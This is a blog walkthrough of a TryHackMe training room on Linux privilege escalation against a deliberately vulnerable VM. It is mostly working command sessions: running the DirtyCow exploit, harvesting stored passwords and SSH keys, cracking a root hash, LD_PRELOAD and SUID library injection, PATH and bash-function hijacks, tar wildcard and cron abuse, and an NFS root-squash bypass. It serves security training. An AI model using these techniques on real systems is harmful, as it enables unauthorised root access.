Tryhackme - Linux PrivEsc Arena

Tryhackme – Linux PrivEsc Arena

In this walk through, we will be going through the Linux PrivEsc Arena from Tryhackme. This room is rated as Medium on the platform and teaches students about Linux privilege escalation techniques using a vulnerable Linux VM. So, let’s get started without any delay.

Tryhackme - Linux PrivEsc Arena

Task 1 – [Optional] Connecting to the TryHackMe network

Task 1 - [Optional] Connecting to the TryHackMe network

Task 2 – Deploy the vulnerable machine

Question 1 – Deploy the machine and log into the user account via SSH (or use the browser-based terminal).

Done

SSH login

Task 2 - Deploy the vulnerable machine

Task 3 – Privilege Escalation – Kernel Exploits

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ ~/tools/linux-exploit-suggester/linux-exploit-suggester.sh 

Linux exploit suggester

CVE-2016-5195

TCM@debian:~$ gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
TCM@debian:~$ ./c0w 
                                
   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap d7989000

madvise 0

ptrace 0

TCM@debian:~$ passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

dirtycow exploit

Task 3 - Privilege Escalation - Kernel Exploits

Task 4 – Privilege Escalation – Stored Passwords (Config Files)

Question 1 – What password did you find?

TCM@debian:~$ cat /home/user/myvpn.ovpn 


TCM@debian:~$ cat /etc/openvpn/auth.txt

cat /home/user/myvpn.ovpn

password321

Question 2 – What user’s credentials were exposed in the OpenVPN auth file?

user

Task 4 - Privilege Escalation - Stored Passwords (Config Files)

Task 5 – Privilege Escalation – Stored Passwords (History)

TCM@debian:~$ cat ~/.bash_history | grep -i passw
mysql -h somehost.local -uroot -ppassword123
cat /etc/passwd | cut -d: -f1
awk -F: '($3 == "0") {print}' /etc/passwd

cat ~/.bash_history | grep -i passw

Question 1 – What was TCM trying to log into?

mysql

Question 2 – Who was TCM trying to log in as?

root

Question 3 – Naughty naughty.  What was the password discovered?

password123

Task 5 - Privilege Escalation - Stored Passwords (History)

Task 6 – Privilege Escalation – Weak File Permissions

Question 1 – What were the file permissions on the /etc/shadow file?

TCM@debian:~$ ls -al /etc/shadow
-rw-rw-r-- 1 root shadow 809 Jun 17  2020 /etc/shadow

ls -al /etc/shadow

-rw-rw-r--

Task 6 - Privilege Escalation - Weak File Permissions

Task 7 – Privilege Escalation – SSH Keys

Question 1 – What’s the full file path of the sensitive file you discovered?

TCM@debian:~$ find / -name authorized_keys 2> /dev/null
TCM@debian:~$ find / -name id_rsa 2> /dev/null
/backups/supersecretkeys/id_rsa

find / -name authorized_keys 2> /dev/null
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ chmod 600 id_rsa 
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ ssh -i id_rsa [email protected] 
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 17 23:31:40 2020 from 192.168.4.51
root@debian:~# 

/backups/supersecretkeys/id_rsa

/backups/supersecretkeys/id_rsa
Task 7 - Privilege Escalation - SSH Keys

Task 8 – Privilege Escalation – Sudo (Shell Escaping)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ sudo -l

sudo -l

Task 8 - Privilege Escalation - Sudo (Shell Escaping)

Task 9 – Privilege Escalation – Sudo (Abusing Intended Functionality)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ sudo -l

sudo -l

echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::' > roothash.txt

wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ john --wordlist=/home/wh1terose/Desktop/Wordlist/rockyou.txt hash.txt
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (root)
1g 0:00:00:29 100% 0.03377g/s 506.5p/s 555.2c/s 555.2C/s iluvnick..deirdre
Use the "--show" option to display all of the cracked passwords reliably
Session completed
roothash.txt
john cracking
Task 9 - Privilege Escalation - Sudo (Abusing Intended Functionality)

Task 10 – Privilege Escalation – Sudo (LD_PRELOAD)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done
TCM@debian:~$ sudo -l

TCM@debian:~$ nano x.c

x.c

TCM@debian:~$ gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
TCM@debian:~$ sudo LD_PRELOAD=/tmp/x.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

Task 10 - Privilege Escalation - Sudo (LD_PRELOAD)

Task 11 – Privilege Escalation – SUID (Shared Object Injection)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null

TCM@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -i -E 


TCM@debian:~$ mkdir /home/user/.config
TCM@debian:~$ cd /home/user/.config
TCM@debian:~/.config$ nano libcalc.c

libcalc.c

TCM@debian:~/.config$ gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
TCM@debian:~/.config$ /usr/local/bin/suid-so
Calculating something, please wait...
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

Task 11 - Privilege Escalation - SUID (Shared Object Injection)

Question 1 – What CVE is being exploited in this task?

CVE-2016-1247
CVE-2016-1247

Question 2 – What binary is SUID enabled and assists in the attack?

sudo

Task 12 - Privilege Escalation - SUID (Symlinks)

Task 13 – Privilege Escalation – SUID (Environment Variables #1)

Question 1 – What is the last line of the “strings /usr/local/bin/suid-env” output?

TCM@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null


TCM@debian:~$ strings /usr/local/bin/suid-env

TCM@debian:~$ echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
TCM@debian:~$ gcc /tmp/service.c -o /tmp/service
TCM@debian:~$ export PATH=/tmp:$PATH
TCM@debian:~$ /usr/local/bin/suid-env
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

find / -type f -perm

getting root

service apache2 start

Task 13 - Privilege Escalation - SUID (Environment Variables #1)

Task 14 – Privilege Escalation – SUID (Environment Variables #2)

Question 1 – What is the last line of the “strings /usr/local/bin/suid-env2” output?

TCM@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null

TCM@debian:~$ strings /usr/local/bin/suid-env2

TCM@debian:~$ function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
TCM@debian:~$ export -f /usr/sbin/service
TCM@debian:~$ /usr/local/bin/suid-env2
bash-4.1# id
uid=0(root) gid=0(root) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

strings /usr/local/bin/suid-env2

/usr/local/bin/suid-env2

TCM@debian:~$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

 env -i

root
/usr/sbin/service apache2 start

Task 14 - Privilege Escalation - SUID (Environment Variables #2)

Task 15 – Privilege Escalation – Capabilities

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ getcap -r / 2>/dev/null
/usr/bin/python2.6 = cap_setuid+ep
TCM@debian:~$ /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

getcap -r / 2>/dev/null

Task 15 - Privilege Escalation - Capabilities

Task 16 – Privilege Escalation – Cron (Path)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ cat /etc/crontab


TCM@debian:~$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
TCM@debian:~$ chmod +x /home/user/overwrite.sh
TCM@debian:~$  /tmp/bash -p
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

cat /etc/crontab

Task 16 - Privilege Escalation - Cron (Path)

Task 17 – Privilege Escalation – Cron (Wildcards)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ cat /etc/crontab

TCM@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
TCM@debian:~$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
TCM@debian:~$ 2. touch /home/user/--checkpoint=1
-bash: 2.: command not found
TCM@debian:~$ touch /home/user/--checkpoint=1
TCM@debian:~$ touch /home/user/--checkpoint-action=exec=sh\ runme.sh
TCM@debian:~$ /tmp/bash -p
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

cat /etc/crontab
Task 17 - Privilege Escalation - Cron (Wildcards)

Task 18 – Privilege Escalation – Cron (File Overwrite)

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done

TCM@debian:~$ cat /etc/crontab

TCM@debian:~$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
TCM@debian:~$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
TCM@debian:~$ /tmp/bash -p
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

cat /etc/crontab
Task 18 - Privilege Escalation - Cron (File Overwrite)

Task 19 – Privilege Escalation – NFS Root Squashing

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Done
TCM@debian:~$ cat /etc/exports

cat /etc/exports
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ showmount -e 10.10.155.186
Export list for 10.10.155.186:
/tmp *
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ mkdir /tmp/1
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ mount -o rw,vers=2 10.10.155.186:/tmp /tmp/1
mount: only root can use "--options" option
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ sudo mount -o rw,vers=2 10.10.155.186:/tmp /tmp/1
[sudo] password for wh1terose: 
wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ sudo gcc /tmp/1/x.c -o /tmp/1/x

wh1terose@fsociety:~/CTF/Linux PrivEsc Arena$ sudo chmod +s /tmp/1/x
showmount -e
sudo gcc /tmp/1/x.c -o /tmp/1/x
TCM@debian:~$ /tmp/x
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
getting root
Task 19 - Privilege Escalation - NFS Root Squashing

Also Read: Tryhackme – Linux Fundamentals Part 3

So that was “Linux PrivEsc Arena” for you. In this room, we covered a variety of Linux privilege escalation techniques which we can use once we landed in a linux machine. Well, the best thing on any machine is to be root and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top